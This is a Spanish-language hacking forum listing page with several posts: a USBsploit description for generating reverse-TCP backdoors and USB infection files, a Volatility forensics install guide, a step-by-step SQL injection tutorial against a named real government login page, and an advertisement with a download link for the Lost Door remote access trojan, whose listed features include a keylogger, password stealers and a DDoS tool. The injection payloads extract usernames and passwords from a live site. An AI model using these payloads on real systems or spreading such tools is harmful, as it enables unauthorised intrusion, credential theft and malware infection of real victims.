BGP
OSPF
EIGRP
WLCCP
VRRP, VRRPv3
BFD (Protocolo de Reenvio Bidireccional)
LDP (Protocolo de Diustribución de Etiquetas)
MPLS (re-etiquetado, interfaz de tunel)

Instalación de Loki

Más Información & Descarga De Loki

Videos: Funte: Un Informático en el Lado del Mal

<a href="http://www.youtube.com/watch?v=B9sSY8bge08" target="_blank">http://www.youtube.com/watch?v=B9sSY8bge08</a>

<a href="http://www.youtube.com/watch?v=d1Kxf8xYmfE" target="_blank">http://www.youtube.com/watch?v=d1Kxf8xYmfE</a>

<a href="http://www.youtube.com/watch?v=3SNO4FuobPg" target="_blank">http://www.youtube.com/watch?v=3SNO4FuobPg</a>

12

Hacking / USBsploit

« en: Marzo 31, 2013, 03:29:05 am »

center]

[/center]

USBsploit es una prueba de concepto que genera puertas traseras "reverse_tcp" (x86, x64, todos los puertos) y archivos maliciosos LNK (accesos directos). USBsploit trabaja a través de sesiones Meterpreter, es una versión modificada de Metasploit. La interfaz es un mod de SET (Social Engineer Toolkit).

Características

Crear un Backdoor.
Crear un LNK y un autorun.inf.
Crear un PDF y un autorun.inf.
Crear un Backdoor y lanzar un oyente multi-controlador para el ataque de descarga USB.
Crear una puerta trasera, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / EXE infección.
Crear un Backdoor, LNK a, un autorun.inf y lanzar un oyente multi-controlador de la Auto USB [run | play] / LNK infección.
Crear una puerta trasera, un PDF, un autorun.inf y lanzar un oyente multi-controlador de la Auto USB [run | play] infección / PDF.
Crear una puerta trasera, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / EXE infección y el ataque de descarga USB.
Crear un Backdoor, LNK a, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] / LNK infección y el ataque de descarga USB.
Crear una puerta trasera, un PDF, un autorun.inf y lanzar un oyente multi-controlador para el Auto USB [run | play] infección / PDF y el ataque de descarga USB.
Crear un Backdoor, LNK un PDF y un archivo. Vuelva a colocar todos los archivos EXE, PDF LNK y por los maliciosos generados o costumbres, si es posible.
Lanzamiento de un oyente LNK (sin infección directa USB aquí) para obtener una conexión de vuelta de la unidades USB infectadas con el archivo LNK pasado generó.
Entre Otras.

Instalacion Ubuntu

Descargan el archivo, en mi caso será (usbsploit-0.6-BETA-linux-i686.tar.gz) y lo extraen.
Se nos creara una carpeta llamada usbsploit y nos dirigiremos hacia ella mediante el terminal.
Una ves dentro de la carpeta usbsploit le daremos permisos de ejecucion con el siguiente comando ( chmod +x installer.sh ).
Instalamos la tool de la siguiente forma ( ./installer.sh ).
Se nos instalara la tool automaticamente y borraremos la carpeta usbsploit que si miramos dentro nos quedo vacia ya que al instalarlo los archivos se movieron de sitio.
Cerramos todo y abrimos un nuevo terminal y escribiremos usbsploit y la tool se iniciara automaticamente

http://secuobs.com/sommaires/USBsploit.html

13

Forense / Volatility Framework

« en: Marzo 30, 2013, 02:18:25 am »

Volatility es un Framework con un conjunto de herramientas desarrolladas enteramente en Python con licencia GNU. Este Framework esta pensado para extraer de una imagen de un disco los datos volátiles que estaban en memoria RAM. Estas técnicas de extracción las podemos utilizar Windows y/o Linux.

Entre las características podemos mencionar las siguientes:

- Tipo de sistema, fecha y hora
- Procesos que se estaban ejecutando
- Puertos abiertos
- Puertos conectados
- DLLs cargadas por proceso
- Ficheros cargados por procesos
- Claves del registro utilizadas en los procesos
- Modulos del Kernell
- Mapa fisico de offsets a direcciones virtuales
- Direccionamiento de memoria por proceso
- Extración de ejecutables

La mayoría de plugins han sido desarrollados por Brendan Dolan (aka moyix) y pueden encontrarse, junto con una referencia al mensaje de su blog en el que realiza una pequeña introducción al uso y características del mismo, en la siguiente dirección:

http://www.cc.gatech.edu/~brendan/volatility/

Otra gran fuente de información con una recopilación de los plugins disponibles así como una breve descripción de la funcionalidad ofrecida por cada uno de ellos la podemos encontrar en:

http://www.forensicswiki.org/wiki/List_of_Volatility_Plugins

Instalación de Volatility

Código: [Seleccionar]

:~$ cd /usr/local
:~$ wget https://www.volatilesystems.com/volatility/1.3/Volatility-1.3_Beta.tar.gz

Ahora desempaquetamos el contenido e incluiremos un enlace simbólico al directorio obtenido, de forma que siempre apunte a la ultima versión del framework que tengamos instalada:

Código: [Seleccionar]

:~$ tar xvzf Volatility-1.3_Beta.tar.gz
:~$ rm -f Volatility-1.3_Beta.tar.gz
:~$ ln -s Volatility-1.3_Beta/ volatility

14

Defacing / Inyección SQL a Login ASP

« en: Marzo 28, 2013, 01:33:54 am »

Bien comencemos, para este tutorial utizare la página de http://informaticaeducacion.nl.gob.mx/saci/login.asp

Este tutorial es con fines educativos y no me hago responsable del uso que le den.

En el en campo "Clave de Acceso" y "Password" del login escribimos:

Código: [Seleccionar]

' having 1= 1--

Al hacerlo nos dara el seguiente error:

Sabemos que es vulnerable y nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave, teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]

' group by Usuario.Clave having 1 = 1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Nombre", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]

' group by Usuario.Clave, Usuario.Nombre having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Clave_de_Acceso", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Password", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tipo_de_Usuario", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.Tunto_de_Captura", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura having 1=1--

Hacemos la inyección y el siguiente error sera así:

Nos acaba de dar el nombre de la tabla y la columna "Usuario.ESTATUS", teniendo esto regresamos a nuestro login y escribimos:

Código: [Seleccionar]

' group by Usuario.Clave, Usuario.Nombre, Usuario.Clave_de_Acceso, Usuario.Password, Usuario.Tipo_de_Usuario, Usuario.Punto_de_Captura, Usuario.ESTATUS having 1=1--

Como podemos observar al hacer esto nos dira "clave de acceso y/o password incorrectos" esto quiere decir que hemos terminado de buscar las tablas y columnas.

Nuestra siguiente inyección sera de esta forma:

Código: [Seleccionar]

' union select 1,1,1,1,1,1,min(Clave_de_Acceso) from Usuario where Clave_de_Acceso > 'a'--

Esta parte tenemos 6 unos y min(LOGIN) es la posición al hacer la inyección les arroja los datos.

La posión de los unos puede varia un ejemplo podría ser:

Código: [Seleccionar]

' union select 1,1,1,1,min(Clave_de_Acceso)1,1 from Usuario where Clave_de_Acceso > 'a'--

Curiosamente al hacer la inyección de esta forma tenemos el acceso:

Código: [Seleccionar]

' union select 1,1,1,1,1,1,min(Password) from Usuario where Clave_de_Acceso > 'ADMIN'--

La inyección para que les arroje la password es:

Código: [Seleccionar]

' union select 1,1,1,1,1,1,min(Password) from Usuario where Password > 'ADMIN'--

15

Descarga de Malwares / Lost®Door V8.0.1 Fix

« en: Marzo 28, 2013, 01:12:44 am »

Lost Door Tested in & Support all of Windows OS [Win xp, Win Vista, Win 7, Win 8, Starter, x32 Bits& x64Bits]
Save & Load Builder Settings[17-10-2012]
Generate Folder & ActiveX Name [18-10-2012]
Clear The Temp Folder (image Preview)[18-10-2012]
Classify The Downloaded files into the Host Name folder[18-10-2012]
A Better way to infect all USB[18-10-2012]
Get & Choose Webcam's Drivers[19-10-2012]
Get Windows OS Serial Number [19-10-2012]
Choose Clients Forms' Transparency [07-11-2012]
Get Flag By IP or by System Language [09-11-2012]
Now you Can Choose Server's Icon [12/11/2012]
Offline Key Logger Fixed And Re added [20-12-2012]
Various Bugs Fixed [ over Flow for 62 Bits in start up ]
Powerfull D-DOser [2/01/2013]
Desable Taskmanager & Regedit on server start up [01/02/2013]
Protect Server's Process set it Critical
Add Passwords stealers ( Piding , FireFox , IE7 , IE8 , Trillian , Yahoo , FileZilla , VPN , windows & IDM Serials)
Stability Improved

BlogSpot: http://lost-door.blogspot.com/
Download: http://ge.tt/859D3dP/v/2?c

Páginas: [1] 2 3 4 5